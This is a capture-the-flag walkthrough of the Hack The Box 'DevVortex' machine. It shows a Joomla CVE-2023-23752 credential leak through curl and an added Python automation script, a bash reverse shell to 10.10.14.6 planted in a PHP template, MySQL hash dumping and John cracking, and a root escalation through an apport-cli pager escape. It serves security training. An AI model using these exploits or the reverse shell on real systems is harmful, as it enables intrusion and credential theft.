[Hack The Box Write-Up: DevVortex] - [Easy]

Reconnaissance and Initial Steps

The journey began with an nmap scan:

# Nmap 7.94 scan initiated Wed Dec  6 12:30:49 2023 as: nmap -v -sC -sV -oN nmap/10.10.11.242 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec  6 12:32:05 2023 -- 1 IP address (1 host up) scanned in 75.89 seconds

Key findings:

  • SSH (Port 22): OpenSSH 8.2p1 on Ubuntu.
  • HTTP (Port 80): Nginx 1.18.0 on Ubuntu, redirecting to http://devvortex.htb/.

The IP address and domain were added to /etc/hosts:

echo "10.10.11.242 devvortex.htb" | sudo tee -a /etc/hosts

Initial Foothold

Browsing devvortex.htb by hand turned up nothing useful, so I moved on to enumeration.

The first significant step was directory enumeration using Gobuster:

gobuster dir -u http://devvortex.htb/ -w $wordlists/content/dirs-and-files-medium.txt -t 50
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://devvortex.htb/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /Users/mekaneo/Hacking/wordlists/content/dirs-and-files-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/12/08 17:32:43 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css                  (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js                   (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]
===============================================================
2023/12/08 17:32:51 Finished
===============================================================

Nothing interesting was found under the main vhost. DNS subdomain enumeration revealed dev.devvortex.htb:

gobuster dns -d devvortex.htb -w $wordlists/dns/subdomains-top1million-20000.txt -t 20
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     devvortex.htb
[+] Threads:    20
[+] Timeout:    1s
[+] Wordlist:   /Users/mekaneo/Hacking/wordlists/dns/subdomains-top1million-20000.txt
===============================================================
2023/12/08 17:37:57 Starting gobuster in DNS enumeration mode
===============================================================
Found: dev.devvortex.htb

Progress: 1013 / 19967 (5.07%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/12/08 17:38:02 Finished
===============================================================

I added it to /etc/hosts and browsed the new site. /robots.txt exposed the site's directory layout, which made it clear this is a Joomla CMS.

Attempts with common credentials on the Joomla login page were unsuccessful.

CVE-2023-23752 to code execution

From VulnCheck:

On February 16, 2023, Joomla! published a security advisory for CVE-2023-23752. The advisory describes an “improper access check” affecting Joomla! 4.0.0 through 4.2.7. The following day, a Chinese-language blog shared the technical details of the vulnerability. The blog describes an authentication bypass that allows an attacker to leak privileged information.

Leveraging CVE-2023-23752 in Joomla: the web services API normally requires a token, but appending public=true to a request for the application configuration bypasses the access check and returns the site configuration, database credentials included, to an unauthenticated client:

Request

curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq .

Response

{
  ...
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbtype": "mysqli",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "host": "localhost",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
    },
   ...
}
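
The response above spreads the configuration over one object per key, all sharing the same id, which is awkward to read by eye. The following script is an added example (not code from the original write-up or from Joomla): it issues the same request, folds the JSON:API data array into a single dictionary and pulls out the database settings; it also checks a version string against the 4.0.0 to 4.2.7 range quoted from the advisory. The endpoint path and the public=true parameter come from the write-up; the sample response embedded below is constructed to mirror the shape shown above (the db and dbprefix entries are not part of the excerpt and are included only for illustration).

```python
"""Added example (not from the original write-up or from Joomla).

Queries Joomla's /api/index.php/v1/config/application endpoint with the
public=true bypass used for CVE-2023-23752 and merges the leaked
attributes into one dictionary. SAMPLE_RESPONSE is constructed for
offline use; the live request path is only taken when a base URL is
given on the command line.
"""
import json
import urllib.request
from urllib.parse import urlencode

CONFIG_ENDPOINT = "/api/index.php/v1/config/application"


def merge_config_attributes(body: str) -> dict:
    """Fold the JSON:API ``data`` array into one flat dict.

    The endpoint returns one object per configuration key, each carrying
    a single attribute next to the (repeated) application id; merging
    them turns the excerpt into the dbtype/host/user/password tuple.
    """
    doc = json.loads(body)
    merged = {}
    for item in doc.get("data", []):
        for key, value in item.get("attributes", {}).items():
            if key != "id":  # the id is repeated in every object
                merged[key] = value
    return merged


def extract_db_credentials(config: dict) -> dict:
    """Pick out the database settings needed for the next step."""
    keys = ("dbtype", "host", "user", "password", "db", "dbprefix")
    return {k: config[k] for k in keys if k in config}


def is_affected_version(version: str) -> bool:
    """CVE-2023-23752 affects Joomla 4.0.0 through 4.2.7 (advisory range)."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return (4, 0, 0) <= parts <= (4, 2, 7)


def fetch_config(base_url: str, timeout: float = 10.0) -> dict:
    """Live request against a target (network access; not run offline)."""
    url = base_url.rstrip("/") + CONFIG_ENDPOINT + "?" + urlencode({"public": "true"})
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return merge_config_attributes(resp.read().decode("utf-8", "replace"))


# Constructed sample mirroring the response shape shown in the write-up.
SAMPLE_RESPONSE = json.dumps({
    "links": {"self": "http://dev.devvortex.htb" + CONFIG_ENDPOINT + "?public=true"},
    "data": [
        {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"user": "lewis", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"password": "P4ntherg0t1n5r3c0n##", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "sd4fg_", "id": 224}},
    ],
})

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        creds = extract_db_credentials(fetch_config(sys.argv[1]))
    else:
        creds = extract_db_credentials(merge_config_attributes(SAMPLE_RESPONSE))
    for k, v in creds.items():
        print(f"{k:9s} {v}")
```

Run it with no arguments to see the parsed sample, or with http://dev.devvortex.htb as the argument to query a live instance. Treat is_affected_version as a quick triage aid only: the fix is in the API access check, so a patched 4.2.7 backport would still report as affected by version alone, and the definitive test is whether the unauthenticated request returns the password field.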

The first thing I tried was to SSH into the server with these credentials, but that failed. They did, however, log me into the Joomla administrator dashboard: the database password had been reused for the CMS admin account.

From there, code execution is straightforward. An administrator can edit template files, and anything written into a PHP template runs as the web server user on the next request. I went to System->Templates->Administrator Templates and opened index.php.

PHP reverse shell inserted into the template (10.10.14.6 is the attacking machine):

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'");

Catching the connection with a netcat listener, started before the edited template is saved so the callback is not missed:

nc -l 4444

Stabilizing the shell:

script /dev/null -c /bin/bash
CTRL + Z
stty raw -echo; fg
Then press Enter twice, and then enter:
export TERM=xterm

Now, I had a properly working shell, but my current user couldn't read the user flag:

www-data@devvortex:~/dev.devvortex.htb/administrator$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation "www-data" -> "logan"

The credentials leaked by CVE-2023-23752 are Joomla's database credentials, so I used them to connect to the local MySQL instance and look at the users table (Joomla prefixes its tables with a per-site random string, here sd4fg_):

www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 26575
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)

mysql> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select username,password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan    | $2y$10$IT4k5k--------------------------------------/yBtkIj12 |
+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)

The users table held a second account, logan, with a bcrypt-hashed password. To crack it, I saved the hash to a file named hash.txt and ran John the Ripper against rockyou.txt:

john --format=bcrypt --wordlist=$wordlists/passwords/rockyou.txt hash.txt
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 0% 0g/s 52.88p/s 52.88c/s 52.88C/s billabong..froggy
teq-------cho    (?)
1g 0:00:00:26 100% 0.03763g/s 52.84p/s 52.84c/s 52.84C/s leelee..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John recovered the password in 26 seconds: teq-------cho.

I then SSHed into the box as logan with the cracked password and read the user flag:

cat user.txt
bbb1****************ef4a

Privilege Escalation "logan" -> "root"

The first thing I did as a user was to list logan's sudo privileges:

logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

I could run /usr/bin/apport-cli as root via sudo, but needed a way to turn that into a shell. A quick search turned up a CVE in apport-cli itself:

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.

All of those conditions were met here (sudo access to apport-cli, less as the pager, an interactive terminal I controlled), so I started exploring.

logan@devvortex:~$ sudo /usr/bin/apport-cli
No pending crash reports. Try --help for more information.
logan@devvortex:~$ sudo /usr/bin/apport-cli --help
Usage: apport-cli [options] [symptom|pid|package|program path|.apport/.crash file]

Options:
  -h, --help            show this help message and exit
  -f, --file-bug        Start in bug filing mode. Requires --package and an
                        optional --pid, or just a --pid. If neither is given,
                        display a list of known symptoms. (Implied if a single
                        argument is given.)
  -w, --window          Click a window as a target for filing a problem
                        report.
  -u UPDATE_REPORT, --update-bug=UPDATE_REPORT
                        Start in bug updating mode. Can take an optional
                        --package.
  -s SYMPTOM, --symptom=SYMPTOM
                        File a bug report about a symptom. (Implied if symptom
                        name is given as only argument.)
  -p PACKAGE, --package=PACKAGE
                        Specify package name in --file-bug mode. This is
                        optional if a --pid is specified. (Implied if package
                        name is given as only argument.)
  -P PID, --pid=PID     Specify a running program in --file-bug mode. If this
                        is specified, the bug report will contain more
                        information.  (Implied if pid is given as only
                        argument.)
  --hanging             The provided pid is a hanging application.
  -c PATH, --crash-file=PATH
                        Report the crash from given .apport or .crash file
                        instead of the pending ones in /var/crash. (Implied if
                        file is given as only argument.)
  --save=PATH           In bug filing mode, save the collected information
                        into a file instead of reporting it. This file can
                        then be reported later on from a different machine.
  --tag=TAG             Add an extra tag to the report. Can be specified
                        multiple times.
  -v, --version         Print the Apport version number.

From the help text, apport-cli either files a new bug report or processes an existing crash file. With no pending crashes on the system, I started a new report in interactive bug-filing mode:

logan@devvortex:~$ sudo /usr/bin/apport-cli -f

*** What kind of problem do you want to report?


Choices:
  1: Display (X.org)
  2: External or internal storage devices (e. g. USB sticks)
  3: Security related problems
  4: Sound/audio related problems
  5: dist-upgrade
  6: installation
  7: installer
  8: release-upgrade
  9: ubuntu-release-upgrader
  10: Other problem
  C: Cancel
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1


*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.

*** What display problem do you observe?


Choices:
  1: I don't know
  2: Freezes or hangs during boot or usage
  3: Crashes or restarts back to login screen
  4: Resolution is incorrect
  5: Shows screen corruption
  6: Performance is worse than expected
  7: Fonts are the wrong size
  8: Other display-related problem
  C: Cancel
Please choose (1/2/3/4/5/6/7/8/C): 2

***

To debug X freezes, please see https://wiki.ubuntu.com/X/Troubleshooting/Freeze

Press any key to continue...

..dpkg-query: no packages found matching xorg
.................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.4 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C):

Choosing V (View report) hands the report to the system pager, which here is less. less allows a shell command to be run from inside the pager with the ! key, so !/bin/bash spawns a shell, and because apport-cli was started with sudo that shell runs as root. The advisory's mention of terminal size matters in practice: the pager is only used when the report is longer than the terminal, so if V just prints the report and returns to the menu, shrink the terminal window and choose V again.

Running !/bin/bash from inside less gave a root shell, from which I read root.txt:

What would you like to do? Your options are:
  S: Send report (1.4 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# id
uid=0(root) gid=0(root) groups=0(root)
root@devvortex:/home/logan# cat ~/root.txt
37c6************************0d3a

Conclusion

DevVortex chains several small weaknesses into a full compromise: a subdomain found only through DNS enumeration, an unauthenticated configuration leak (CVE-2023-23752) that exposes database credentials, reuse of that password for the Joomla administrator account, code execution through template editing, a crackable bcrypt hash in the database, and finally a sudo rule for apport-cli whose pager allows a shell escape. Each step on its own is low impact; together they take an unauthenticated visitor to root, which is why careful enumeration and patching of the first link in the chain matter so much.